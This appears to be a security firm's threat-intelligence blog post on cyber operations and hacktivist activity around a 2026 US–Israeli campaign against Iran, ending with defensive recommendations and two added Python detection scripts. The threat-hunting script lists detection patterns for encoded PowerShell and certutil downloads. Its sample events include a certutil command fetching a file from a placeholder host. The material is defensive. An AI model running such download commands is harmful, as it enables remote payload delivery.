Introduction
On February 28, 2026, the United States and Israel launched Operation Roaring Lion, the joint military campaign against Iranian military, nuclear, and government targets. Within hours, fighter jets and cruise missiles were striking IRGC command centers across the country. But the assault was not limited to the physical world.
In parallel, Iran plunged into a near-total digital blackout. Internet connectivity collapsed to just 4% of normal traffic. Government services, news platforms, security communications, and mobile apps failed across major cities. Pro-regime news sites were injected with PSYOPS content. A prayer app with over 30 million installations was hijacked to send surrender messages to soldiers. State television satellite feeds were replaced with speeches by Trump and Netanyahu.
For organizations worldwide, the takeaway is urgent: cyber warfare is no longer a sideshow to conventional conflict. It is a primary theatre of operations, and its consequences spill across borders.
A Decade of Cyber Escalation
This did not start in 2026. The roots trace back to Stuxnet (2010), the US-Israeli cyberweapon that physically destroyed Iranian nuclear centrifuges at Natanz. Iran responded by building offensive cyber capabilities under the IRGC, launching attacks against US financial institutions (Operation Ababil, 2012–2014), Saudi Aramco, and more recently, water utilities across the United States.
The June 2025 Twelve-Day War marked the moment cyber operations became fully integrated with kinetic strikes. Cyberattacks surged 700% within 48 hours. Predatory Sparrow wiped Bank Sepah’s data and burned $90 million in stolen Nobitex cryptocurrency. Over 100 pro-Iranian hacktivist groups mobilized on Telegram. Israel was the most targeted country by geopolitically motivated hackers in 2025, absorbing 12.2% of all global attacks.
By February 2026, with Iran’s conventional military options severely degraded, cyber became the regime’s sole remaining instrument of asymmetric retaliation and simultaneously the most devastating weapon used against it.
February 28, 2026: The Cyber Front
The cyber operations accompanying the strikes were notable for their speed, coordination, and psychological sophistication. Here is what we observed:
1. Pro-Regime News Agencies Compromised
Facts:
Within the first hours of the strikes, multiple popular pro-regime Iranian news agencies were simultaneously compromised. Legitimate-looking but fabricated content was injected into their front pages, designed to degrade the morale of pro-regime forces using classic PSYOPS tactics. The sites were quickly taken down and restored, but not before reaching a wide audience during the most critical early hours.
Analysis:
By injecting content at the exact moment Iranians turned to state media for strike coverage, the attackers maximized psychological impact during the regime’s most vulnerable window. The simultaneous compromise of multiple outlets suggests pre-positioned access – these intrusions were prepared well in advance and activated on cue.
2. BadeSabaa Prayer App Hijacked
Facts:
Shortly after, BadeSabaa, a popular Iranian prayer time app with over 30 million installations from the Iranian app store, was hijacked. Push notifications were sent to its entire user base, calling on army members to surrender and join the people if they wanted to survive.
ZENDATA Technical Insight: The Hidden Risk in BadeSabaa
The target selection was precise. As a prayer time app, its users skew heavily religious and conservative (a demographic overlapping significantly with pro-regime supporters and military personnel). But the deeper concern is technical: the app requires location access to provide accurate prayer times, and most users would have granted this permission. If the backend was compromised deeply enough to send push notifications, it is reasonable to assume that telemetry logs, location data, and unique device identifiers were also exposed. Correlating this data across 30 million users opens significant intelligence possibilities, from tracking military personnel movements to identifying force concentrations. This is not to say it necessarily happened, but the potential is remarkable.
Note: Rumors circulated that EITAA, Iran’s popular domestic messaging app, was also taken down. ZENDATA verified that this was not the case and EITAA remained accessible.
3. Nationwide Internet Blackout
Facts:
Iran went into full internet blackout, starting with MCI and expanding nationwide within approximately a day. This appears to be a self-imposed shutdown by Iranian authorities, not the result of an external cyberattack.
Analysis:
This is likely a multi-purpose measure: containing public exposure to the impact of strikes, attempting denial of service to smaller drone guidance systems (a tactic that proved ineffective during the June 2025 war), and maintaining a veil over potential crackdowns on civilian protests. A small number of hosts remained accessible from outside Iran. Interestingly, comparing current accessibility data with logs from previous blackout periods reveals notable discrepancies in what remains reachable and what does not. The internet kill switch remains a double-edged sword: it denies intelligence to the adversary but also cripples internal coordination, economic activity, and public trust.
4. National TV Satellite Hijack
Facts:
During the second day of strikes, Iranian national television’s Channel 3 satellite streams on IntelSat were hijacked (the second such incident since the recent wave of protests). Viewers were shown video broadcasts of speeches by Donald Trump and Benjamin Netanyahu instead of regular programming.
Analysis:
Satellite broadcast hijacking directly penetrates the regime’s most controlled information channel. For viewers accustomed to managed state media, seeing enemy leaders on their national channel reinforces the narrative that the regime has lost control. The recurrence suggests the IntelSat relay vulnerability has not been remediated, or is being re-exploited through different vectors.
Other covert cyber operations are believed to be ongoing. We will update this analysis as additional incidents are confirmed.
The Hacktivism Surge: Pro-Iranian Groups in Overdrive
Beyond the state-level operations described above, the conflict has triggered a massive surge in hacktivist activity, predominantly from pro-Iranian and pro-Palestinian groups. While most of these operations are low in sophistication, their sheer volume and coordinated timing create real noise, consume defender resources, and serve as a force multiplier for the psychological dimension of the conflict.
A Dramatic Shift in Targeting
The statistics tell a stark story. Over the last 6 months, the global distribution of cyber incidents reflected broader threat trends: the United States led with 18% of all incidents, followed by India (6%), Israel (6%), Indonesia (5%), and Thailand (5%). But in the last 24 hours since the February 28 strikes, the picture has shifted dramatically:
| Rank | Last 6 Months | % | Last 24 Hours | % |
|---|---|---|---|---|
| 1 | USA (4,239) | 18% | Israel (45) | 21% |
| 2 | India (1,504) | 6% | USA (26) | 12% |
| 3 | Israel (1,330) | 6% | UAE (21) | 10% |
| 4 | Indonesia (1,186) | 5% | Kuwait (16) | 7% |
| 5 | Thailand (1,143) | 5% | Saudi Arabia (12) | 5% |
Source: Threat intelligence monitoring, March 1–2, 2026
Israel jumped from 6% to 21% of global incidents in just 24 hours – a 3.5x increase. Crucially, Gulf states – UAE, Kuwait, and Saudi Arabia – appeared in the top 5 for the first time, reflecting retaliatory and spillover targeting linked to their proximity to the conflict and hosting of US military assets.
What the Attacks Look Like
Analysis of 179 recent threat incidents paints a clear picture of the hacktivist playbook:
| Attack Type | Count | Example Targets |
|---|---|---|
| DDoS Attacks | 67 | Israel Defense Forces, Union Bank of Israel, Israel Innovation Authority, Archive of Our Own |
| Alerts / Threat Claims | 36 | AnonGhost, 313 Team, Cyber Isnaad Front claiming US/Israel/Gulf targets |
| Data Leaks / Breaches | 25 | Israeli MoD, IDF military database, Israeli civilians, eBay |
| Website Defacement | 19 | Israeli and Gulf government sites, corporate websites |
| Ransomware | 18 | US cities, schools, industrial companies (Qilin, INC RANSOM) |
| Initial Access Sales | 9 | CCTV systems, SCADA/PLC, RDWeb access in USA |
DDoS attacks dominate at 37% of all incidents, consistent with hacktivist preference for high-visibility, low-effort disruption. But the data also reveals more concerning activity: 9 incidents involving initial access sales (including CCTV systems and SCADA/PLC access in the US), alleged breaches of Israeli Defense Forces servers and Ministry of Defense data, and targeted data leaks of military personnel and civilian information.
The Groups Behind It
The hacktivist ecosystem active in the last 48 hours includes a mix of established and emerging groups:
- RipperSec – most active group in the dataset, repeatedly targeting Israeli government bodies like the Israel Innovation Authority and Export Institute.
- DieNet – focusing DDoS campaigns on US targets.
- 313 Team / UniT 313 – claiming broad multi-country targeting including Israel, USA, Saudi Arabia, UAE, Jordan, and Kuwait.
- Dark Storm Team – targeting Israeli banking (Union Bank of Israel) and Western platforms.
- APT IRAN – a self-styled APT group conducting operations against Israeli infrastructure.
- Conquerors Electronic Army, Cyber Islamic Resistance-Axis, Cyber Isnaad Front – groups explicitly aligning with Iranian/Axis of Resistance narratives.
- AnonGhost, BD Anonymous, BABAYO EROR SYSTEM – declaring simultaneous targeting of Israel and the USA.
ZENDATA Assessment: Noise vs. Signal
The majority of these hacktivist operations are low-to-medium sophistication: DDoS floods, recycled data leaks, website defacements, and exaggerated claims. Many groups inflate their impact for media attention and Telegram credibility. However, this noise should not be dismissed. It consumes security team bandwidth, distracts from more advanced threats, and occasionally includes genuinely dangerous activity like SCADA/PLC access in US infrastructure and military data breaches. The key question is always which hacktivist front is actually a state-sponsored “faketivist” operation. Analysis of 250,000+ Telegram messages from 178 groups during the 2025 conflict revealed coordination patterns inconsistent with organic activism.
Key Cyber Actors
| Side | Key Actors | Notable Operations |
|---|---|---|
| Pro-Israel | Predatory Sparrow, Unit 8200, US Cyber Command | Bank Sepah data wipe, $90M Nobitex crypto burn, state TV hijack, GPS jamming, Feb 2026 total blackout |
| Pro-Iran | Handala, RipperSec, DieNet, 313 Team, Dark Storm Team, APT IRAN, CyberAv3ngers, APT33/34/42 | DDoS campaigns, data leaks, SCADA/PLC exploitation, website defacement, military data breaches, Shamoon 4.0 |
What This Means for Your Business
Even without direct Middle East exposure, the cyber spillover from this conflict creates tangible risks. Iran’s conventional military is degraded; cyber is its primary remaining retaliation tool. Iranian APT groups have a documented history of targeting energy, finance, defense, and water utilities in the US, Europe, and the Gulf. Meanwhile, opportunistic cybercriminals exploit geopolitical chaos with conflict-themed phishing, malicious links disguised as breaking news, and ransomware timed to organizational distraction.
The hacktivist data confirms this: the US is the second most targeted nation in the last 24 hours, and incidents include attempted access to surveillance cameras, SCADA/PLC systems, and RDWeb portals across American organizations. Gulf states are also seeing unprecedented targeting.
Recommendations
Immediate Actions
- Activate and scale DDoS protection. Pro-Iranian groups favor high-volume DDoS as their primary weapon.
- Audit internet-facing OT/ICS systems. Iranian actors specifically target industrial control systems and PLCs. Disable non-essential exposed services.
- Issue targeted phishing alerts warning employees about conflict-themed lures and urgency-based social engineering.
- Enforce MFA everywhere. Iranian groups use MFA push-bombing – flooding users with login requests until one is accepted.
- Rotate credentials for systems connected to energy, defense, government, or financial sectors.
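The push-bombing pattern mentioned above is detectable in authentication logs: one account receives a burst of MFA push challenges, most are denied, and one is eventually approved. The script below is an added illustration, not ZENDATA's tooling or any vendor's product; the log format (`timestamp user event`), the event names and the thresholds are assumptions, and the log lines are constructed.

```python
"""Flag MFA push-bombing patterns in constructed authentication logs.

Added example, not code from the original article. The log format, the event
names (push_sent / push_denied / push_approved) and the thresholds are
assumptions chosen for illustration; adapt them to your identity provider's
export format.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: "timestamp user event", one event per line.
SAMPLE_LOG = """\
2026-03-01T08:00:01Z alice push_sent
2026-03-01T08:00:02Z alice push_denied
2026-03-01T08:00:10Z alice push_sent
2026-03-01T08:00:11Z alice push_denied
2026-03-01T08:00:20Z alice push_sent
2026-03-01T08:00:21Z alice push_denied
2026-03-01T08:00:30Z alice push_sent
2026-03-01T08:00:32Z alice push_approved
2026-03-01T09:15:00Z bob push_sent
2026-03-01T09:15:05Z bob push_approved
"""

WINDOW = timedelta(minutes=5)   # assumed sliding window
MAX_PUSHES = 3                  # more pushes than this inside one window is suspicious


def parse_log(text):
    """Parse the assumed log format into (timestamp, user, event) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, event = line.split()
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), user, event))
    return events


def find_push_bombing(events, window=WINDOW, max_pushes=MAX_PUSHES):
    """Return {user: details} for users whose push count in any sliding window
    exceeds max_pushes. 'denials_before_approval' and 'eventually_approved'
    tell the analyst whether the flood ended in a successful login, which is
    the case that needs an immediate session revoke and credential rotation."""
    by_user = defaultdict(list)
    for ts, user, event in sorted(events):
        by_user[user].append((ts, event))

    findings = {}
    for user, evs in by_user.items():
        pushes = [ts for ts, e in evs if e == "push_sent"]
        # Sliding window over push timestamps: track the densest burst.
        start, worst = 0, 0
        for end in range(len(pushes)):
            while pushes[end] - pushes[start] > window:
                start += 1
            worst = max(worst, end - start + 1)
        if worst <= max_pushes:
            continue
        denials, approved = 0, False
        for _, e in evs:
            if e == "push_denied":
                denials += 1
            elif e == "push_approved":
                approved = True
                break
        findings[user] = {
            "max_pushes_in_window": worst,
            "denials_before_approval": denials,
            "eventually_approved": approved,
        }
    return findings


if __name__ == "__main__":
    for user, info in find_push_bombing(parse_log(SAMPLE_LOG)).items():
        print(user, info)
```

In the constructed sample, `alice` receives four pushes in thirty seconds, denies three and approves the fourth, which is exactly the outcome push-bombing aims for; `bob` gets a single push and is not flagged. Number-matching or FIDO2 authenticators remove the "just tap approve" failure mode entirely, so this detection is a stopgap for environments still on simple push approval.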
Medium-Term (Next 30 Days)
- Adopt zero-trust architecture. Micro-segment networks to prevent lateral movement from a single compromised endpoint.
- Implement immutable offline backups. Wiper malware – Iran’s weapon of choice since Shamoon in 2012 – makes recovery impossible without clean backups.
- Hunt proactively. Iranian APTs use “living-off-the-land” techniques, leveraging legitimate admin tools to avoid detection.
- Assess supply chain exposure. If your vendors operate in the Middle East or use Israeli-made OT equipment, their risk is your risk.
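Living-off-the-land activity hides inside tools that are legitimately present on every host, so hunting for it means looking at context (which parent launched the tool, with what arguments) rather than at the tool itself. The script below is an added example written for this article, not ZENDATA's or any EDR vendor's detection content; the event schema, the parent/child pairings and the argument heuristics are assumptions, and the process events are constructed.

```python
"""Hunt for living-off-the-land patterns in process-creation telemetry.

Added example, not code from the original article. The event schema (dicts
with parent / image / cmdline), the parent-child pairings and the argument
patterns are assumptions for illustration; map them onto your own EDR or
Sysmon fields before use.
"""
import re

# Document and mail clients that should rarely launch scripting or admin tools.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
# Legitimate admin tools that LOTL tradecraft commonly repurposes.
ADMIN_TOOLS = {"powershell.exe", "cmd.exe", "wmic.exe", "certutil.exe",
               "mshta.exe", "rundll32.exe"}
# Command-line traits that are unusual for routine administration.
SUSPICIOUS_ARGS = [
    (re.compile(r"-e(nc|ncodedcommand)?\b", re.I), "encoded PowerShell command"),
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"\burlcache\b", re.I), "certutil used as a downloader"),
    (re.compile(r"\bbypass\b", re.I), "execution policy bypass"),
]

# Constructed sample events; the base64 blob and URL are placeholders.
CONSTRUCTED_EVENTS = [
    {"id": 1, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe Get-Process"},
    {"id": 2, "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -enc <base64-placeholder>"},
    {"id": 3, "parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
    {"id": 4, "parent": "cmd.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -f http://placeholder.invalid/file file"},
]


def score_event(ev):
    """Return a list of human-readable reasons the event looks like LOTL abuse.
    An empty list means the event is consistent with ordinary admin use."""
    reasons = []
    image = ev["image"].lower()
    parent = ev["parent"].lower()
    if parent in OFFICE_PARENTS and image in ADMIN_TOOLS:
        reasons.append(f"{parent} spawned {image}")
    if image in ADMIN_TOOLS:
        for pattern, label in SUSPICIOUS_ARGS:
            if pattern.search(ev["cmdline"]):
                reasons.append(label)
    return reasons


def hunt(events):
    """Map event id -> reasons for every event that triggers at least one heuristic."""
    return {ev["id"]: r for ev in events if (r := score_event(ev))}


if __name__ == "__main__":
    for event_id, reasons in hunt(CONSTRUCTED_EVENTS).items():
        print(event_id, "; ".join(reasons))
```

The interesting property is that event 1, an administrator running PowerShell interactively, is not flagged even though the binary is on the watch list: the heuristics fire on the combination of an unusual parent and an unusual argument shape, which is what separates tooling abuse from day-to-day administration. Tune the parent and argument lists against a baseline of your own telemetry before alerting on them.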
A Note on CISA Capacity
The US Cybersecurity and Infrastructure Security Agency has been operating with sharply reduced staffing due to a DHS funding lapse. Organizations should not rely solely on government alerts and should invest in their own threat intelligence and incident response capabilities.
Conclusion
The February 2026 escalation makes one thing unmistakable: cyber warfare is a primary theatre of modern conflict. The operations we observed combine technical sophistication – pre-positioned infrastructure compromise, satellite hijacking, AI-driven targeting – with deep psychological strategy: exploiting prayer apps, injecting PSYOPS at peak attention moments, and engineering nationwide information blackouts.
The hacktivist dimension adds another layer: over 170 groups flooding targets with DDoS, defacements, and data leaks, while more sophisticated actors probe critical infrastructure. The line between independent hacktivism and state-sponsored operations is deliberately blurred, making attribution – and proportional response – increasingly difficult.
For organizations worldwide, the threat environment has fundamentally shifted. State-sponsored actors with proven capabilities are operating with reduced restraint and increased motivation. The companies and institutions that invested in defense-in-depth, zero-trust, and proactive threat hunting will weather this storm. Those that deferred these investments are now exposed.
ZENDATA’s Threat Intelligence Unit continues to actively monitor this conflict and will update this analysis as events develop. If your organization needs support with threat assessment, incident response, or infrastructure hardening, contact us at info@zendata.security or call our 24/7 hotline at +41 22 588 65 90.
